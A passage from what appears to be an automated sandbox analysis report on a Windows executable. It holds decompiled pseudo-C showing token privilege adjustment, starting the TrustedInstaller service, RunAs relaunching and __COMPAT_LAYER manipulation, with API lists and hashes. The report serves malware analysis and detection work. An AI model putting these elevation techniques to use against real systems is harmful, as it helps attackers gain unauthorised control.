                                                                                                  					_t41 = GetExitCodeProcess(_t43,  &_a4); // executed
                                                                                                  					if(_t41 != 0 && _a4 != 0x103) {
                                                                                                  						_t44 = _a4;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return _t44;
                                                                                                  			}













                                                                                                  0x00401c31
                                                                                                  0x00401c33
                                                                                                  0x00401c48
                                                                                                  0x00401c4f
                                                                                                  0x00401c61
                                                                                                  0x00401c68
                                                                                                  0x00401c74
                                                                                                  0x00401c79
                                                                                                  0x00401c7a
                                                                                                  0x00401c7b
                                                                                                  0x00401c84
                                                                                                  0x00401c89
                                                                                                  0x00401c8e
                                                                                                  0x00401c8f
                                                                                                  0x00401c9b
                                                                                                  0x00401ca6
                                                                                                  0x00401caf
                                                                                                  0x00401cb9
                                                                                                  0x00401cc0
                                                                                                  0x00401cc7
                                                                                                  0x00401cce
                                                                                                  0x00401cd5
                                                                                                  0x00401cdd
                                                                                                  0x00401ce0
                                                                                                  0x00401d14
                                                                                                  0x00401ce2
                                                                                                  0x00401ce8
                                                                                                  0x00401cf3
                                                                                                  0x00401cf6
                                                                                                  0x00401cfe
                                                                                                  0x00401d09
                                                                                                  0x00401d09
                                                                                                  0x00401cfe
                                                                                                  0x00401d1b

                                                                                                  APIs
                                                                                                  • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                                  • memset.MSVCRT ref: 00401C4F
                                                                                                  • memset.MSVCRT ref: 00401C68
                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                  • _snwprintf.MSVCRT ref: 00401C8F
                                                                                                  • memset.MSVCRT ref: 00401C9B
                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                                  • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                                  • GetExitCodeProcess.KERNELBASE ref: 00401CF6
                                                                                                  • GetLastError.KERNEL32 ref: 00401D0E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                                  • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                                  • API String ID: 903100921-3385179869
                                                                                                  • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                  • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                                  • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                                  • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
                                                                                                  				void* _v8;
                                                                                                  				intOrPtr _v12;
                                                                                                  				struct _TOKEN_PRIVILEGES _v24;
                                                                                                  				void* __esi;
                                                                                                  				_Unknown_base(*)()* _t16;
                                                                                                  				_Unknown_base(*)()* _t18;
                                                                                                  				long _t19;
                                                                                                  				_Unknown_base(*)()* _t22;
                                                                                                  				_Unknown_base(*)()* _t24;
                                                                                                  				struct HINSTANCE__** _t35;
                                                                                                  				void* _t37;
                                                                                                  
                                                                                                  				_t37 = __eflags;
                                                                                                  				_t35 = __eax;
                                                                                                  				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
                                                                                                  					return GetLastError();
                                                                                                  				}
                                                                                                  				_t16 = E00408F72(_t35);
                                                                                                  				__eflags = _t16;
                                                                                                  				if(_t16 != 0) {
                                                                                                  					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
                                                                                                  					__eflags = _t24;
                                                                                                  					if(_t24 != 0) {
                                                                                                  						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_v24.PrivilegeCount = 1;
                                                                                                  				_v12 = 2;
                                                                                                  				_a4 = _v8;
                                                                                                  				_t18 = E00408F72(_t35);
                                                                                                  				__eflags = _t18;
                                                                                                  				if(_t18 != 0) {
                                                                                                  					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
                                                                                                  					__eflags = _t22;
                                                                                                  					if(_t22 != 0) {
                                                                                                  						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_t19 = GetLastError();
                                                                                                  				FindCloseChangeNotification(_v8); // executed
                                                                                                  				return _t19;
                                                                                                  			}














                                                                                                  0x00408fc9
                                                                                                  0x00408fd0
                                                                                                  0x00408fe8
                                                                                                  0x00000000
                                                                                                  0x00408fea
                                                                                                  0x00408ff4
                                                                                                  0x00409001
                                                                                                  0x00409003
                                                                                                  0x0040900c
                                                                                                  0x0040900e
                                                                                                  0x00409010
                                                                                                  0x0040901a
                                                                                                  0x0040901a
                                                                                                  0x00409010
                                                                                                  0x0040901f
                                                                                                  0x00409026
                                                                                                  0x0040902d
                                                                                                  0x00409030
                                                                                                  0x00409035
                                                                                                  0x00409037
                                                                                                  0x00409040
                                                                                                  0x00409042
                                                                                                  0x00409044
                                                                                                  0x00409051
                                                                                                  0x00409051
                                                                                                  0x00409044
                                                                                                  0x00409053
                                                                                                  0x0040905e
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                    • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                  • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueW), ref: 0040900C
                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0040901A
                                                                                                  • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 00409040
                                                                                                  • AdjustTokenPrivileges.KERNELBASE(00000002,00000000,00000001,00000000,00000000,00000000), ref: 00409051
                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000), ref: 00409053
                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040905E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$ErrorLast$AdjustChangeCloseCurrentFindLookupNotificationPrivilegePrivilegesProcessTokenValue
                                                                                                  • String ID: AdjustTokenPrivileges$LookupPrivilegeValueW
                                                                                                  • API String ID: 616250965-1253513912
                                                                                                  • Opcode ID: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                  • Instruction ID: 03a5dc6c67e2a3af6dad2eaf9b7d3d3c38ee31464385454108c093b6d6cde588
                                                                                                  • Opcode Fuzzy Hash: b5b45514c93916933a35bd7cc4bbde3415ee7f14846a7c37f1b94fb4e6c9eb93
                                                                                                  • Instruction Fuzzy Hash: 34114F72500105FFEB10AFF4DD859AF76ADAB44384B10413AF541F2192DA789E449B68
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00401306(void* _a4) {
                                                                                                  				intOrPtr _v28;
                                                                                                  				struct _SERVICE_STATUS _v32;
                                                                                                  				void* _t5;
                                                                                                  				int _t9;
                                                                                                  				int _t12;
                                                                                                  				void* _t14;
                                                                                                  
                                                                                                  				_t12 = 0; // executed
                                                                                                  				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
                                                                                                  				_t14 = _t5;
                                                                                                  				if(_t14 != 0) {
                                                                                                  					_t9 = QueryServiceStatus(_t14,  &_v32); // executed
                                                                                                  					if(_t9 != 0 && _v28 != 4) {
                                                                                                  						_t12 = StartServiceW(_t14, 0, 0);
                                                                                                  					}
                                                                                                  					CloseServiceHandle(_t14);
                                                                                                  				}
                                                                                                  				CloseServiceHandle(_a4);
                                                                                                  				return _t12;
                                                                                                  			}









                                                                                                  0x00401319
                                                                                                  0x0040131b
                                                                                                  0x00401327
                                                                                                  0x0040132b
                                                                                                  0x00401332
                                                                                                  0x0040133a
                                                                                                  0x0040134b
                                                                                                  0x0040134b
                                                                                                  0x0040134e
                                                                                                  0x0040134e
                                                                                                  0x00401353
                                                                                                  0x0040135b

                                                                                                  APIs
                                                                                                  • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                  • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                  • String ID: TrustedInstaller
                                                                                                  • API String ID: 862991418-565535830
                                                                                                  • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                  • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                  • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                  • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                                                  				struct HRSRC__* _t12;
                                                                                                  				void* _t16;
                                                                                                  				void* _t17;
                                                                                                  				signed int _t18;
                                                                                                  				signed int _t26;
                                                                                                  				signed int _t29;
                                                                                                  				signed int _t33;
                                                                                                  				struct HRSRC__* _t35;
                                                                                                  				signed int _t36;
                                                                                                  
                                                                                                  				_t12 = FindResourceW(_a4, _a12, _a8); // executed
                                                                                                  				_t35 = _t12;
                                                                                                  				if(_t35 != 0) {
                                                                                                  					_t33 = SizeofResource(_a4, _t35);
                                                                                                  					if(_t33 > 0) {
                                                                                                  						_t16 = LoadResource(_a4, _t35);
                                                                                                  						if(_t16 != 0) {
                                                                                                  							_t17 = LockResource(_t16);
                                                                                                  							if(_t17 != 0) {
                                                                                                  								_a4 = _t33;
                                                                                                  								_t29 = _t33 * _t33;
                                                                                                  								_t36 = 0;
                                                                                                  								_t7 =  &_a4;
                                                                                                  								 *_t7 = _a4 >> 2;
                                                                                                  								if( *_t7 != 0) {
                                                                                                  									do {
                                                                                                  										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
                                                                                                  										_t36 = _t36 + 1;
                                                                                                  										_t29 = _t26;
                                                                                                  									} while (_t36 < _a4);
                                                                                                  								}
                                                                                                  								_t18 =  *0x40fa70; // 0xfcb617dc
                                                                                                  								 *0x40fa70 = _t18 + _t29 ^ _t33;
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return 1;
                                                                                                  			}












                                                                                                  0x0040a348
                                                                                                  0x0040a34e
                                                                                                  0x0040a352
                                                                                                  0x0040a35f
                                                                                                  0x0040a363
                                                                                                  0x0040a369
                                                                                                  0x0040a371
                                                                                                  0x0040a374
                                                                                                  0x0040a37c
                                                                                                  0x0040a380
                                                                                                  0x0040a383
                                                                                                  0x0040a386
                                                                                                  0x0040a388
                                                                                                  0x0040a388
                                                                                                  0x0040a38c
                                                                                                  0x0040a38f
                                                                                                  0x0040a39f
                                                                                                  0x0040a3a1
                                                                                                  0x0040a3a5
                                                                                                  0x0040a3a5
                                                                                                  0x0040a3a9
                                                                                                  0x0040a3aa
                                                                                                  0x0040a3b3
                                                                                                  0x0040a3b3
                                                                                                  0x0040a37c
                                                                                                  0x0040a371
                                                                                                  0x0040a3b8
                                                                                                  0x0040a3be

                                                                                                  APIs
                                                                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                  • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                  • String ID:
                                                                                                  • API String ID: 3473537107-0
                                                                                                  • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                  • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                  • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                  • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 83%
                                                                                                  			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
                                                                                                  				WCHAR* _v8;
                                                                                                  				signed int _v12;
                                                                                                  				int _v16;
                                                                                                  				int _v20;
                                                                                                  				char* _v24;
                                                                                                  				int _v28;
                                                                                                  				intOrPtr _v32;
                                                                                                  				int _v36;
                                                                                                  				int _v40;
                                                                                                  				char _v44;
                                                                                                  				void* _v56;
                                                                                                  				int _v60;
                                                                                                  				char _v92;
                                                                                                  				void _v122;
                                                                                                  				int _v124;
                                                                                                  				short _v148;
                                                                                                  				signed int _v152;
                                                                                                  				intOrPtr _v168;
                                                                                                  				intOrPtr _v172;
                                                                                                  				intOrPtr _v176;
                                                                                                  				intOrPtr _v180;
                                                                                                  				void _v192;
                                                                                                  				char _v196;
                                                                                                  				char _v228;
                                                                                                  				void _v258;
                                                                                                  				int _v260;
                                                                                                  				void _v786;
                                                                                                  				short _v788;
                                                                                                  				void _v1314;
                                                                                                  				short _v1316;
                                                                                                  				void _v1842;
                                                                                                  				short _v1844;
                                                                                                  				void _v18234;
                                                                                                  				short _v18236;
                                                                                                  				char _v83772;
                                                                                                  				void* __ebx;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				short* _t174;
                                                                                                  				short _t175;
                                                                                                  				signed int _t176;
                                                                                                  				short _t177;
                                                                                                  				short _t178;
                                                                                                  				int _t184;
                                                                                                  				signed int _t187;
                                                                                                  				intOrPtr _t207;
                                                                                                  				intOrPtr _t219;
                                                                                                  				int* _t252;
                                                                                                  				int* _t253;
                                                                                                  				int* _t266;
                                                                                                  				int* _t267;
                                                                                                  				wchar_t* _t270;
                                                                                                  				int _t286;
                                                                                                  				void* _t292;
                                                                                                  				void* _t304;
                                                                                                  				WCHAR* _t308;
                                                                                                  				WCHAR* _t310;
                                                                                                  				intOrPtr* _t311;
                                                                                                  				int _t312;
                                                                                                  				WCHAR* _t315;
                                                                                                  				void* _t325;
                                                                                                  				void* _t328;
                                                                                                  
                                                                                                  				_t304 = __edx;
                                                                                                  				E0040B550(0x1473c, __ecx);
                                                                                                  				_t286 = 0;
                                                                                                  				 *_a4 = 0;
                                                                                                  				_v12 = 0;
                                                                                                  				_v16 = 0;
                                                                                                  				_v20 = 0;
                                                                                                  				memset( &_v192, 0, 0x40);
                                                                                                  				_v60 = 0;
                                                                                                  				asm("stosd");
                                                                                                  				asm("stosd");
                                                                                                  				asm("stosd");
                                                                                                  				_v24 = 0;
                                                                                                  				_v40 = 0;
                                                                                                  				_v28 = 0;
                                                                                                  				_v36 = 0;
                                                                                                  				_v32 = 0x100;
                                                                                                  				_v44 = 0;
                                                                                                  				_v1316 = 0;
                                                                                                  				memset( &_v1314, 0, 0x208);
                                                                                                  				_v788 = 0;
                                                                                                  				memset( &_v786, 0, 0x208);
                                                                                                  				_t315 = _a8;
                                                                                                  				_t328 = _t325 + 0x24;
                                                                                                  				_v83772 = 0;
                                                                                                  				_v196 = 0x44;
                                                                                                  				E00404923(0x104,  &_v788, _t315);
                                                                                                  				if(wcschr(_t315, 0x25) != 0) {
                                                                                                  					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
                                                                                                  				}
                                                                                                  				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
                                                                                                  					_v8 = _t286;
                                                                                                  					_v1844 = _t286;
                                                                                                  					memset( &_v1842, _t286, 0x208);
                                                                                                  					_t328 = _t328 + 0xc;
                                                                                                  					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
                                                                                                  					if(_v1844 != _t286) {
                                                                                                  						E00404923(0x104,  &_v788,  &_v1844);
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_t308 =  &(_t315[0x2106]);
                                                                                                  				if( *_t308 == _t286) {
                                                                                                  					E00404B5C( &_v1316,  &_v788);
                                                                                                  					__eflags = _v1316 - _t286;
                                                                                                  					_t315 = _a8;
                                                                                                  					_pop(_t292);
                                                                                                  					if(_v1316 == _t286) {
                                                                                                  						goto L11;
                                                                                                  					}
                                                                                                  					goto L10;
                                                                                                  				} else {
                                                                                                  					_v20 = _t308;
                                                                                                  					_t270 = wcschr(_t308, 0x25);
                                                                                                  					_pop(_t292);
                                                                                                  					if(_t270 == 0) {
                                                                                                  						L11:
                                                                                                  						_t174 =  &(_t315[0x220e]);
                                                                                                  						if( *_t174 != 1) {
                                                                                                  							_v152 = _v152 | 0x00000001;
                                                                                                  							_v148 =  *_t174;
                                                                                                  						}
                                                                                                  						_t309 = ",";
                                                                                                  						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
                                                                                                  							_v260 = _t286;
                                                                                                  							memset( &_v258, _t286, 0x3e);
                                                                                                  							_v124 = _t286;
                                                                                                  							memset( &_v122, _t286, 0x3e);
                                                                                                  							_v8 = _t286;
                                                                                                  							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
                                                                                                  							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
                                                                                                  							_v152 = _v152 | 0x00000004;
                                                                                                  							_t266 =  &_v260;
                                                                                                  							_push(_t266);
                                                                                                  							L0040B1F8();
                                                                                                  							_v180 = _t266;
                                                                                                  							_t328 = _t328 + 0x3c;
                                                                                                  							_t267 =  &_v124;
                                                                                                  							L0040B1F8();
                                                                                                  							_t292 = _t267;
                                                                                                  							_v176 = _t267;
                                                                                                  						}
                                                                                                  						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
                                                                                                  							_v260 = _t286;
                                                                                                  							memset( &_v258, _t286, 0x3e);
                                                                                                  							_v124 = _t286;
                                                                                                  							memset( &_v122, _t286, 0x3e);
                                                                                                  							_v8 = _t286;
                                                                                                  							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
                                                                                                  							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
                                                                                                  							_v152 = _v152 | 0x00000002;
                                                                                                  							_t252 =  &_v260;
                                                                                                  							_push(_t252);
                                                                                                  							L0040B1F8();
                                                                                                  							_v172 = _t252;
                                                                                                  							_t328 = _t328 + 0x3c;
                                                                                                  							_t253 =  &_v124;
                                                                                                  							_push(_t253);
                                                                                                  							L0040B1F8();
                                                                                                  							_v168 = _t253;
                                                                                                  						}
                                                                                                  						_t310 =  &(_t315[0x105]);
                                                                                                  						if( *_t310 != _t286) {
                                                                                                  							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
                                                                                                  								_push(_t310);
                                                                                                  							} else {
                                                                                                  								_v18236 = _t286;
                                                                                                  								memset( &_v18234, _t286, 0x4000);
                                                                                                  								_t328 = _t328 + 0xc;
                                                                                                  								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
                                                                                                  								_push( &_v18236);
                                                                                                  							}
                                                                                                  							_push( &_v788);
                                                                                                  							_push(L"\"%s\" %s");
                                                                                                  							_push(0x7fff);
                                                                                                  							_push( &_v83772);
                                                                                                  							L0040B1EC();
                                                                                                  							_v24 =  &_v83772;
                                                                                                  						}
                                                                                                  						_t175 = _t315[0x220c];
                                                                                                  						if(_t175 != 0x20) {
                                                                                                  							_v12 = _t175;
                                                                                                  						}
                                                                                                  						_t311 = _a4;
                                                                                                  						if(_t315[0x2254] == 2) {
                                                                                                  							E00401D1E(_t311, L"RunAsInvoker");
                                                                                                  						}
                                                                                                  						_t176 = _t315[0x265c];
                                                                                                  						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
                                                                                                  							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
                                                                                                  						}
                                                                                                  						_t177 = _t315[0x265e];
                                                                                                  						if(_t177 != 1) {
                                                                                                  							__eflags = _t177 - 2;
                                                                                                  							if(_t177 != 2) {
                                                                                                  								goto L37;
                                                                                                  							}
                                                                                                  							_push(L"16BITCOLOR");
                                                                                                  							goto L36;
                                                                                                  						} else {
                                                                                                  							_push(L"256COLOR");
                                                                                                  							L36:
                                                                                                  							E00401D1E(_t311);
                                                                                                  							L37:
                                                                                                  							if(_t315[0x2660] == _t286) {
                                                                                                  								__eflags = _t315[0x2662] - _t286;
                                                                                                  								if(_t315[0x2662] == _t286) {
                                                                                                  									__eflags = _t315[0x2664] - _t286;
                                                                                                  									if(_t315[0x2664] == _t286) {
                                                                                                  										__eflags = _t315[0x2666] - _t286;
                                                                                                  										if(_t315[0x2666] == _t286) {
                                                                                                  											L46:
                                                                                                  											_t178 = _t315[0x2a6e];
                                                                                                  											_t358 = _t178 - 3;
                                                                                                  											if(_t178 != 3) {
                                                                                                  												__eflags = _t178 - 2;
                                                                                                  												if(_t178 != 2) {
                                                                                                  													__eflags =  *_t311 - _t286;
                                                                                                  													if( *_t311 == _t286) {
                                                                                                  														_push(_t286);
                                                                                                  													} else {
                                                                                                  														_push(_t311);
                                                                                                  													}
                                                                                                  													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
                                                                                                  													L63:
                                                                                                  													_t293 = _t311;
                                                                                                  													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
                                                                                                  													_t312 = _t184;
                                                                                                  													if(_t312 == _t286 && _v60 != _t286) {
                                                                                                  														_t363 = _t315[0x266c] - _t286;
                                                                                                  														if(_t315[0x266c] != _t286) {
                                                                                                  															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
                                                                                                  															_a4 = _a4 | 0xffffffff;
                                                                                                  															_a8 = _t286;
                                                                                                  															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
                                                                                                  															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
                                                                                                  														}
                                                                                                  													}
                                                                                                  													E004055D1(_t184,  &_v44);
                                                                                                  													return _t312;
                                                                                                  												}
                                                                                                  												E00405497( &_v92);
                                                                                                  												E00405497( &_v228);
                                                                                                  												E0040149F(__eflags,  &_v92);
                                                                                                  												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
                                                                                                  												E00401551( &_v228, _t304, __eflags,  &_v92);
                                                                                                  												_t204 = _a4;
                                                                                                  												__eflags =  *_a4;
                                                                                                  												if(__eflags != 0) {
                                                                                                  													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
                                                                                                  												}
                                                                                                  												E00401421( &_v44, _t304,  &_v92, __eflags);
                                                                                                  												_t207 = _v28;
                                                                                                  												__eflags = _t207;
                                                                                                  												_v16 = 0x40c4e8;
                                                                                                  												if(_t207 != 0) {
                                                                                                  													_v16 = _t207;
                                                                                                  												}
                                                                                                  												_v12 = _v12 | 0x00000400;
                                                                                                  												E004054B9( &_v228);
                                                                                                  												E004054B9( &_v92);
                                                                                                  												_t286 = 0;
                                                                                                  												__eflags = 0;
                                                                                                  												L58:
                                                                                                  												_t315 = _a8;
                                                                                                  												_t311 = _a4;
                                                                                                  												goto L63;
                                                                                                  											}
                                                                                                  											E00405497( &_v92);
                                                                                                  											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
                                                                                                  											_t359 =  *_t311 - _t286;
                                                                                                  											if( *_t311 != _t286) {
                                                                                                  												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
                                                                                                  											}
                                                                                                  											E00401421( &_v44, _t304,  &_v92, _t359);
                                                                                                  											_t219 = _v28;
                                                                                                  											_v16 = 0x40c4e8;
                                                                                                  											if(_t219 != _t286) {
                                                                                                  												_v16 = _t219;
                                                                                                  											}
                                                                                                  											_v12 = _v12 | 0x00000400;
                                                                                                  											E004054B9( &_v92);
                                                                                                  											goto L58;
                                                                                                  										}
                                                                                                  										_push(L"HIGHDPIAWARE");
                                                                                                  										L45:
                                                                                                  										E00401D1E(_t311);
                                                                                                  										goto L46;
                                                                                                  									}
                                                                                                  									_push(L"DISABLEDWM");
                                                                                                  									goto L45;
                                                                                                  								}
                                                                                                  								_push(L"DISABLETHEMES");
                                                                                                  								goto L45;
                                                                                                  							}
                                                                                                  							_push(L"640X480");
                                                                                                  							goto L45;
                                                                                                  						}
                                                                                                  					}
                                                                                                  					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
                                                                                                  					L10:
                                                                                                  					_v20 =  &_v1316;
                                                                                                  					goto L11;
                                                                                                  				}
                                                                                                  			}

































































                                                                                                  0x004022d5
                                                                                                  0x004022dd
                                                                                                  0x004022e7
                                                                                                  0x004022ec
                                                                                                  0x004022f7
                                                                                                  0x004022fa
                                                                                                  0x004022fd
                                                                                                  0x00402300
                                                                                                  0x00402307
                                                                                                  0x0040230d
                                                                                                  0x0040230e
                                                                                                  0x00402318
                                                                                                  0x00402321
                                                                                                  0x00402324
                                                                                                  0x00402327
                                                                                                  0x0040232a
                                                                                                  0x0040232d
                                                                                                  0x00402334
                                                                                                  0x00402337
                                                                                                  0x0040233e
                                                                                                  0x0040234f
                                                                                                  0x00402356
                                                                                                  0x0040235b
                                                                                                  0x0040235e
                                                                                                  0x0040236d
                                                                                                  0x00402374
                                                                                                  0x0040237e
                                                                                                  0x00402395
                                                                                                  0x004023a0
                                                                                                  0x004023a0
                                                                                                  0x004023ac
                                                                                                  0x004023cf
                                                                                                  0x004023d2
                                                                                                  0x004023d9
                                                                                                  0x004023de
                                                                                                  0x004023f6
                                                                                                  0x00402403
                                                                                                  0x00402414
                                                                                                  0x00402419
                                                                                                  0x00402403
                                                                                                  0x0040241a
                                                                                                  0x00402423
                                                                                                  0x00402458
                                                                                                  0x0040245d
                                                                                                  0x00402464
                                                                                                  0x00402467
                                                                                                  0x00402468
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00402425
                                                                                                  0x00402428
                                                                                                  0x0040242b
                                                                                                  0x00402433
                                                                                                  0x00402434
                                                                                                  0x00402473
                                                                                                  0x00402473
                                                                                                  0x0040247c
                                                                                                  0x00402481
                                                                                                  0x00402488
                                                                                                  0x00402488
                                                                                                  0x00402495
                                                                                                  0x0040249a
                                                                                                  0x004024b7
                                                                                                  0x004024be
                                                                                                  0x004024cd
                                                                                                  0x004024d1
                                                                                                  0x004024ed
